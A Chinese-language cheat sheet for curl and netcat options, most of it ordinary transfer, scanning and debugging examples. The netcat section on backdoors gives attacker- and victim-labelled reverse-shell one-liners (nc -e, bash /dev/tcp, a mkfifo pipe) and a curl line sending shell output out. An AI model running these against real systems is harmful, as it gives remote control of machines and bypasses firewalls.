CURL
語法: curl [option] [url]
常用參數:
-A/--user-agent <string> 設置用戶代理發送給服務器
-b/--cookie <name=string/file> cookie字符串或文件讀取位置
-c/--cookie-jar <file> 操作結束后把cookie寫入到這個文件中
-C/--continue-at <offset> 斷點續轉
-D/--dump-header <file> 把header信息寫入到該文件中
-e/--referer 來源網址
-f/--fail 連接失敗時不顯示http錯誤
-o/--output 把輸出寫到該文件中
-O/--remote-name 把輸出寫到該文件中,保留遠程文件的文件名
-r/--range <range> 檢索來自HTTP/1.1或FTP服務器字節范圍
-s/--silent 靜音模式。不輸出任何東西
-T/--upload-file <file> 上傳文件
-u/--user <user[:password]> 設置服務器的用戶和密碼
-w/--write-out [format] 什么輸出完成后
-x/--proxy <host[:port]> 在給定的端口上使用HTTP代理
-#/--progress-bar 進度條顯示當前的傳送狀態
例子:
1.1、訪問網址,打印響應的內容(html代碼)
curl http://www.test.com
1.2、參數-f顯示抓取錯誤,
curl -f http://www.test.com/error
1.3、保存訪問的文件
curl http://www.test.com >> test.html
1.4、可以使用curl的內置option:-o(小寫)保存網頁
curl -o test.html http://www.test.
1.5、參數-O(大寫)保存網頁中的文件,注意url要具體到某個文件,不然抓不下來,比如http://www.test.com/page/2/ 是無法抓取的
curl -O http://www.test.com/hello.xml
1.6、測試網頁返回值,在腳本中,這是很常見的測試網站是否正常的用法,一般返回200
curl -o /dev/null -s -w %{http_code} www.test.com
1.7、指定proxy服務器以及其端口,參數 -x 用來支持設置代理
curl -x 192.168.100.100:1080 http://www.test.com
1.8、選項-u完成HTTP或FTP認證
curl -u username:password http://www.test.com
1.9、只使用username,后續運行提示輸入密碼
curl -u username http://www.test.com
2.1、參數 -o(小寫)下載文件,下載到本地的文件需自己命名
curl -o img1.jpg http:www.test.com/img1.jpg
同時下載多個文件
curl -o img1.jpg http://www.test.com/img1.jpg -o img2.jpg http://www.test.com/img2.jpg
2.2、參數 -O(大寫)以服務器上的名稱保存文件到本地
curl -O http://www.test.com/img1.jpg
2.3、循環下載,下載部分文件。例如把img1,img2,img3下載下來
curl -O http://www.test.com/img[1-3].jpg
2.4、分別下載目標完整aa和bb目錄下的img1、img2和img3圖片,但第二次下載的會把第一次下載的覆蓋。
curl -O http://www.test.com/{aa,bb}/dodo[1-3].jpg
2.5、這樣在aa/img1.jpg的文件下載下來就會變成aa_img1.jpg,其他文件依此類推,從而避免了文件被覆蓋
curl -o #1_#2.img http://www.test.com/{aa,bb}/img[1-3].jpg
2.6、分塊下載,對於大文件,使用參數 -r 實現分段下載
curl -r 0-100 -o img_part1.jpg http://www.test.com/img.jpg
curl -r 100-200 -o img_part2.jpg http://www.test.com/img.jpg
curl -r 200- -o img_part3.jpg http://www.test.com/img.jpg
cat img_part* > img.jpg
這樣就可以查看img.jpg的內容了
2.7、通過ftp下載文件,curl提供兩種從ftp中下載的語法
curl -O -u 用戶名:密碼 ftp://www.test.com/img.jpg
curl -O ftp://用戶名:密碼@www.test.com/img.jpg
2.8、顯示下載進度條
curl -# -O http://www.test.com/img.jpg
2.9、不會顯示下載進度信息
curl -s -O http://www.test.com/img.jpg
2.10、斷點續傳,如果在下載dodo1.jpg的過程中突然掉線了,可以使用參數-C實現續傳
curl -C -O http://www.test.com/img.jpg
2.11、#選項--limit-rate限制curl的下載速度
curl --limit-rate 20k http:/www.test.com/img.jpg
2.12、選項--max-filesize指定可下載的最大文件大小。若文件大小超出限制,命令返回一個非0的退出嗎,若正常運行,則返回0
curl --max-filesize bytes http://www.test.com/img.jpg
2.13、上傳文件,-T來實現向ftp服務器上傳了文件test.jpg
curl -T test.jpg -u 用戶名:密碼 ftp://www.test.com/img/
3.1、可以使用 -I 選項顯示 HTTP 頭,而不顯示文件內容
curl -I http://www.test.com
3.2、使用 -i 選項可以同時顯示 HTTP 頭和文件內容,
curl -i http://www.codebelief.com
3.3、參數 -L 跟隨鏈接重定向,假如http://a.test.com是重定向到http://www.test.com,使用-L參數,讓CURL像瀏覽器一樣跟隨連接的重定向,獲取重定向后的頁面的內容
curl http://a.test.com
3.4、 使用 -A 自定義 User-Agent
curl -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" http://www.test.com
3.5、使用 -H 自定義 header。當我們使用 -H 來自定義 User-Agent 時,需要使用 "User-Agent: xxx" 的格式。
curl -H "Referer: www.test.com" -H "User-Agent: Custom-User-Agent" http://www.baidu.com
同時也可以直接在 header 中傳遞 Cookie,格式與上面的例子一樣:
curl -H "Cookie: JSESSIONID=GO322A5063D938589F9G9S9EF8F939K89B" http://www.test.com
3.6、偽造referer(盜鏈),參數 -e 可以設定referer頭
curl -e "www.test.com" http://mail.test.com
4.1、使用 -d 發送 POST 請求,參數 -X 用於指定發送數據的方式:
curl -d "userName=tom&passwd=123456" -X POST http://www.test.com/login
在使用 -d 的情況下,如果省略 -X,則默認為 POST 方式:
curl -d "userName=tom&passwd=123456" http://www.test.com/login
4.2、從文件中讀取數據發送post請求
curl -d "@data.txt" http://www.test.com/login
4.3、在使用 -d 的情況下,強制使用 GET 方式:
curl -d "somedata" -X GET http://www.test.com/api
或者使用 -G 選項:
curl -d "somedata" -G http://www.test.com/api
4.4、參數-c(小寫)保存http的response里面的cookie信息。執行后cookie信息就被存到了cookiec.txt里面了
curl -c cookiec.txt http://www.test.com
4.5、參數-D保存http的response里面的header信息。執行后cookie信息就被存到了cookied.txt里面了,注意:-c(小寫)產生的cookie和-D里面的cookie是不一樣的。
curl -D cookied.txt http://www.test.com
4.6:使用cookie,參數-b 帶上cookie信息訪問網址
curl -b cookiec.txt http://www.test.com
curl -b "JSESSIONID=D0112A5063D938586B659EF8F939BE24" http://www.test.com
4.7、帶 Cookie 登錄
登錄時保存cookie
curl -c "cookie-login" -d "username=test&passwd=123456" http://www.test.com/login
再次訪問該網站時(訪問登錄后的頁面),帶上cookie訪問:
curl -b "cookie-login" http://www.test.com/login
其他參數
-a/--append 上傳文件時,附加到目標文件
--anyauth 可以使用“任何”身份驗證方法
--basic 使用HTTP基本驗證
-B/--use-ascii 使用ASCII文本傳輸
-d/--data <data> HTTP POST方式傳送數據
--data-ascii <data> 以ascii的方式post數據
--data-binary <data> 以二進制的方式post數據
--negotiate 使用HTTP身份驗證
--digest 使用數字身份驗證
--disable-eprt 禁止使用EPRT或LPRT
--disable-epsv 禁止使用EPSV
--egd-file <file> 為隨機數據(SSL)設置EGD socket路徑
--tcp-nodelay 使用TCP_NODELAY選項
-E/--cert <cert[:passwd]> 客戶端證書文件和密碼 (SSL)
--cert-type <type> 證書文件類型 (DER/PEM/ENG) (SSL)
--key <key> 私鑰文件名 (SSL)
--key-type <type> 私鑰文件類型 (DER/PEM/ENG) (SSL)
--pass <pass> 私鑰密碼 (SSL)
--engine <eng> 加密引擎使用 (SSL). "--engine list" for list
--cacert <file> CA證書 (SSL)
--capath <directory> CA目 (made using c_rehash) to verify peer against (SSL)
--ciphers <list> SSL密碼
--compressed 要求返回是壓縮的形勢 (using deflate or gzip)
--connect-timeout <seconds> 設置最大請求時間
--create-dirs 建立本地目錄的目錄層次結構
--crlf 上傳是把LF轉變成CRLF
--ftp-create-dirs 如果遠程目錄不存在,創建遠程目錄
--ftp-method [multicwd/nocwd/singlecwd] 控制CWD的使用
--ftp-pasv 使用 PASV/EPSV 代替端口
--ftp-skip-pasv-ip 使用PASV的時候,忽略該IP地址
--ftp-ssl 嘗試用 SSL/TLS 來進行ftp數據傳輸
--ftp-ssl-reqd 要求用 SSL/TLS 來進行ftp數據傳輸
-F/--form <name=content> 模擬http表單提交數據
-form-string <name=string> 模擬http表單提交數據
-g/--globoff 禁用網址序列和范圍使用{}和[]
-G/--get 以get的方式來發送數據
-h/--help 幫助
-H/--header <line> 自定義頭信息傳遞給服務器
--ignore-content-length 忽略的HTTP頭信息的長度
-i/--include 輸出時包括protocol頭信息
-I/--head 只顯示文檔信息
-j/--junk-session-cookies 讀取文件時忽略session cookie
--interface <interface> 使用指定網絡接口/地址
--krb4 <level> 使用指定安全級別的krb4
-k/--insecure 允許不使用證書到SSL站點
-K/--config 指定的配置文件讀取
-l/--list-only 列出ftp目錄下的文件名稱
--limit-rate <rate> 設置傳輸速度
--local-port<NUM> 強制使用本地端口號
-m/--max-time <seconds> 設置最大傳輸時間
--max-redirs <num> 設置最大讀取的目錄數
--max-filesize <bytes> 設置最大下載的文件總量
-M/--manual 顯示全手動
-n/--netrc 從netrc文件中讀取用戶名和密碼
--netrc-optional 使用 .netrc 或者 URL來覆蓋-n
--ntlm 使用 HTTP NTLM 身份驗證
-N/--no-buffer 禁用緩沖輸出
-p/--proxytunnel 使用HTTP代理
--proxy-anyauth 選擇任一代理身份驗證方法
--proxy-basic 在代理上使用基本身份驗證
--proxy-digest 在代理上使用數字身份驗證
--proxy-ntlm 在代理上使用ntlm身份驗證
-P/--ftp-port <address> 使用端口地址,而不是使用PASV
-Q/--quote <cmd> 文件傳輸前,發送命令到服務器
--range-file 讀取(SSL)的隨機文件
-R/--remote-time 在本地生成文件時,保留遠程文件時間
--retry <num> 傳輸出現問題時,重試的次數
--retry-delay <seconds> 傳輸出現問題時,設置重試間隔時間
--retry-max-time <seconds> 傳輸出現問題時,設置最大重試時間
-S/--show-error 顯示錯誤
--socks4 <host[:port]> 用socks4代理給定主機和端口
--socks5 <host[:port]> 用socks5代理給定主機和端口
-t/--telnet-option <OPT=val> Telnet選項設置
--trace <file> 對指定文件進行debug
--trace-ascii <file> Like --跟蹤但沒有hex輸出
--trace-time 跟蹤/詳細輸出時,添加時間戳
--url <URL> Spet URL to work with
-U/--proxy-user <user[:password]> 設置代理用戶名和密碼
-V/--version 顯示版本信息
-X/--request <command> 指定什么命令
-y/--speed-time 放棄限速所要的時間。默認為30
-Y/--speed-limit 停止傳輸速度的限制,速度時間'秒
-z/--time-cond 傳送時間設置
-0/--http1.0 使用HTTP 1.0
-1/--tlsv1 使用TLSv1(SSL)
-2/--sslv2 使用SSLv2的(SSL)
-3/--sslv3 使用的SSLv3(SSL)
--3p-quote like -Q for the source URL for 3rd party transfer
--3p-url 使用url,進行第三方傳送
--3p-user 使用用戶名和密碼,進行第三方傳送
-4/--ipv4 使用IP4
-6/--ipv6 使用IP6
netcat
注意:ubuntu自帶的nc是netcat-openbsd版,不帶-c/-e參數。
參數
想要連接到某處: nc [-options] hostname port[s] [ports] …
綁定端口等待連接: nc -l port [-options] [hostname] [port]
-g<網關>:設置路由器躍程通信網關,最多設置8個;
-G<指向器數目>:設置來源路由指向器,其數值為4的倍數;
-h:在線幫助;
-i<延遲秒數>:設置時間間隔,以便傳送信息及掃描通信端口;
-l:使用監聽模式,監控傳入的資料;
-n:直接使用ip地址,而不通過域名服務器;
-o<輸出文件>:指定文件名稱,把往來傳輸的數據以16進制字碼傾倒成該文件保存;
-p<通信端口>:設置本地主機使用的通信端口;
-r:指定源端口和目的端口都進行隨機的選擇;
-s<來源位址>:設置本地主機送出數據包的IP地址;
-u:使用UDP傳輸協議;
-v:顯示指令執行過程信息;-vv 顯示執行過程中更詳細的信息
-w<超時秒數>:設置等待連線的時間;
-z:使用0輸入/輸出模式,只在掃描通信端口時使用。
假設服務器A的IP:192.168.0.11
假設服務器B的IP:192.168.0.12
文章部分例子中使用的端口為 4403 ,實際使用根據使用者修改。
1.1、端口掃描
nc -z -v -n 192.168.0.11 21-25
可以運行在TCP或者UDP模式,默認是TCP,-u參數調整為udp.
z 參數告訴netcat使用0 IO,連接成功后立即關閉連接,不進行數據交換
v 參數指使用冗余選項(譯者注:即詳細輸出)
n 參數告訴netcat 不要使用DNS反向查詢IP地址的域名
1.2、連接開放端口21並且打印運行在這個端口上服務的banner信息。
nc -v 192.168.0.11 21
2、聊天服務,建立連接后兩邊機器輸入的信息都能顯示在另一台連接上的機器
服務器A(服務端)執行:nc -l 4403
服務器B(客戶端)執行:nc 192.168.0.11 4403
3.1、文件傳輸(A傳給B,相當於B從A下載文件)
服務器A(服務端)執行:nc -l 4403 < file.txt
服務器B(客戶端)執行:nc -n 192.168.0.11 4403 > file.txt
3.2、傳輸server創建在B(客戶端)上,A(服務端)接收文件(B傳給A):
服務器A(服務端):nc -l 4403 > file.txt
服務器B(客戶端):nc 192.168.0.11 4403 < file.txt
當需要將客戶端子網中某台機器傳輸文件到外網上的某台服務器上時適用,相當於上傳文件
3.3、目錄傳輸(從A傳輸到B),歸檔-傳輸-下載-解壓
服務器A(服務端):tar -cvf – dir_name | nc -l 4403
服務器B(客戶端):nc -n 192.168.0.11 4403 | tar -xvf -
3.4、如果想要節省帶寬傳輸壓縮包,我們可以使用bzip2或者其他工具壓縮。
服務器A(服務端):tar -cvf – dir_name| bzip2 -z | nc -l 4403
服務器B(客戶端):nc -n 192.168.0.11 4403 | bzip2 -d |tar -xvf -
3.4、備份檔案
服務器A(服務端):tar czf - work|nc -l -c -p 1234
服務器B(客戶端):nc 192.168.0.1 1234 >a.tgz
3.5、 加密你通過網絡發送的數據,使用mcrypt工具解密數據。以下兩個命令會提示需要密碼,確保兩端使用相同的密碼
服務器A(服務端):nc localhost 4403 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
服務器B(客戶端):mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 4403
3.6、流視頻
服務器A(服務端):cat video.avi | nc -l 4403
服務器B(客戶端):nc 192.168.0.11 4403 | mplayer -vo x11 -cache 3000 -
4、克隆一個設備
克隆Linux PC很簡單,假如你的系統在磁盤/dev/sda上
dd是一個從磁盤讀取原始數據的工具,我通過netcat服務器重定向它的輸出流到其他機器並且寫入到磁盤中,它會隨着分區表拷貝所有的信息。但是如果我們已經做過分區並且只需要克隆root分區,我們可以根據我們系統root分區的位置,更改sda 為sda1,sda2.等等。
服務器A(服務端):dd if=/dev/sda | nc -l 4403
服務器B(客戶端):nc -n 192.168.0.11 4403 | dd of=/dev/sda
5.1、創建遠程shell,假設本地netcat支持 -c -e 參數(默認 netcat)
服務器A(服務端):nc -l 4403 -e /bin/bash -i
服務器B(客戶端):nc 192.168.0.11 4403
假如netcat 不支持-c 或者 -e 參數(openbsd netcat),我們仍然能夠創建遠程shell
服務器A(服務端):
$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 4403 > /tmp/tmp_fifo
這里我們創建了一個fifo文件,然后使用管道命令把這個fifo文件內容定向到shell 2>&1中。是用來重定向標准錯誤輸出和標准輸出,然后管道到netcat 運行的端口4403上。至此,我們已經把netcat的輸出重定向到fifo文件中。
說明:
從網絡收到的輸入寫到fifo文件中
cat 命令讀取fifo文件並且其內容發送給sh命令
sh命令進程受到輸入並把它寫回到netcat。
netcat 通過網絡發送輸出到client
至於為什么會成功是因為管道使命令平行執行,fifo文件用來替代正常文件,因為fifo使讀取等待而如果是一個普通文件,cat命令會盡快結束並開始讀取空文件。
服務器B(客戶端):
$nc -n 192.168.0.11 4403
5.2、反向shell(后門)
1)反向shell是指在客戶端打開的shell。反向shell這樣命名是因為不同於其他配置,這里服務器使用的是由客戶提供的服務。反向shell經常被用來繞過防火牆的限制,如阻止入站連接。例如,我有一個專用IP地址為192.168.1.11,我使用代理服務器連接到外部網絡。如果我想從網絡外部訪問 這台機器如1.2.3.4的shell,那么我會用反向外殼用於這一目的。
服務器A(服務端):nc -l 4403
服務器B(客戶端):nc 192.168.0.11 4403 -e /bin/bash
2)受害者的機器(服務端) :
nc -l -p port -e cmd.exe // win2000
nc -l -p port -e /bin/sh // unix,linux
攻擊者的機器(客戶端):.
nc ip -p port // 連接受害者機器IP,然后得到一個shell。
3)不使用-e選項反彈shell
攻擊方先執行(服務端):
nc -lnvp 4430
被攻擊方再執行(客戶端):(如果非root賬戶無法執行mknod,則使用mkfifo /tmp/backpipe也可以創建一個管道。)
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 192.168.0.11 4430 1>/tmp/backpipe
4)攻擊者(服務端):
nc -vv -l -p
受害者(客戶端):
nc -e cmd.exe 192.168.0.11 -p 4403
nc -e /bin/sh 192.168.0.11 -p 4403
5)攻擊者(服務端):
nc -vv -l -p 4403
nc -vv -l -p 4404
受害者(客戶端):
nc 192.168.0.11 4403 | cmd.exe | nc 192.168.0.11 4404
nc 192.168.0.11 4403 | /bin/sh | nc 192.168.0.11 4404
6)Bash反彈
攻擊者(服務端,IP:192.168.0.11):
nc -lvvp 4403
受害者(客戶端):
bash -c 'sh -i &>/dev/tcp/192.168.0.11/4403 0>&1'
或者
bash -i >& /dev/tcp/192.168.0.11/4403 0>&1
或者
a=`bash -i >& /dev/tcp/192.168.0.11/4403 0>&1`;curl -d ${a} http://192.168.0.11/4403
6.1、指定源端口通訊,假設防火牆過濾除25端口外其它所有端口,則需要使用-p選項指定源端口。客戶端開啟25端口用於通訊,否則將使用隨機端口。
服務器A(服務端):nc -l 4403
服務器B(客戶端):nc 192.168.0.11 4403 -p 25
6.2、多ip時指定源地址通訊,假設你的機器有多個地址,希望明確指定使用哪個地址用於外部數據通訊。我們可以在netcat中使用-s選項指定ip地址。該命令將綁定地址192.168.0.13。
服務器A(服務端):nc -u -l 4403 < file.txt
服務器B(客戶端):nc -u 192.168.0.11 4403 -s 192.168.0.13 > file.txt
7、用nc命令操作memcached
存儲數據:printf "setkey 0 10 6rnresultrn” |nc 192.168.0.11 11211
獲取數據:printf “get keyrn” |nc 192.168.0.11 11211
刪除數據:printf “delete keyrn” |nc 192.168.0.11 11211
查看狀態:printf "statsrn” |nc 192.168.0.11 11211
模擬top命令查看狀態:watch “echo stats” |nc 192.168.0.11 11211
清空緩存:printf “flush_allrn” |nc 192.168.0.11 11211
8.1、在測試郵件服務器是否正常時,手動使用 SMTP 協議發送郵件
$nc localhost 25 << EOF
HELO host.example.com
MAIL FROM: <user@host.example.com>
RCPT TO: <user2@host.example.com>
DATA
Body of email.
.
QUIT
EOF
8.2、模擬HTTP Headers,訪問一個網站,輸入后雙回車獲取響應內容
$nc www.215814.com 80
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser
9、其他
建立從本地1234端口到www.test.com的80端口連接,5秒超時
nc -p 1234 -w 5 www.test.com 80
u為UDP連接
nc -u www.test.com 53
掃描端口(70到80),可指定范圍。-v輸出詳細信息。
nc -v -z www.test.com 70-80
監聽本地主機TCP80端口
nc -l -p 80
監聽本地主機TCP80端口並將訪問信息記錄下來
nc -l -p 80 >>/log/listen.log
使用'-L'(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c為止
nc -L -p 80
打開本地的7626端口進行監聽,並反饋連接信息。
nc -l -v -p 7626
使用'-L'可以不停地監聽某一個端口,直到ctrl+c為止,同時把結果輸出到'c:/log.txt'中,如果把‘>' 改為‘>>'即可以追加日志
nc -L -p 80 > c:/log.txt
連到192.168.0.11的TCP80端口
nc -nvv 192.168.0.11 80
連接到192.168.0.11的80端口,並在其管道中發送'/test.txt'的內容(攻擊程序)
nc -nvv 192.168.0.11 80 < /test.txt
端口數據抓包.
nc -vv -w 2 -o test.txt xfocus.Net 80 21-15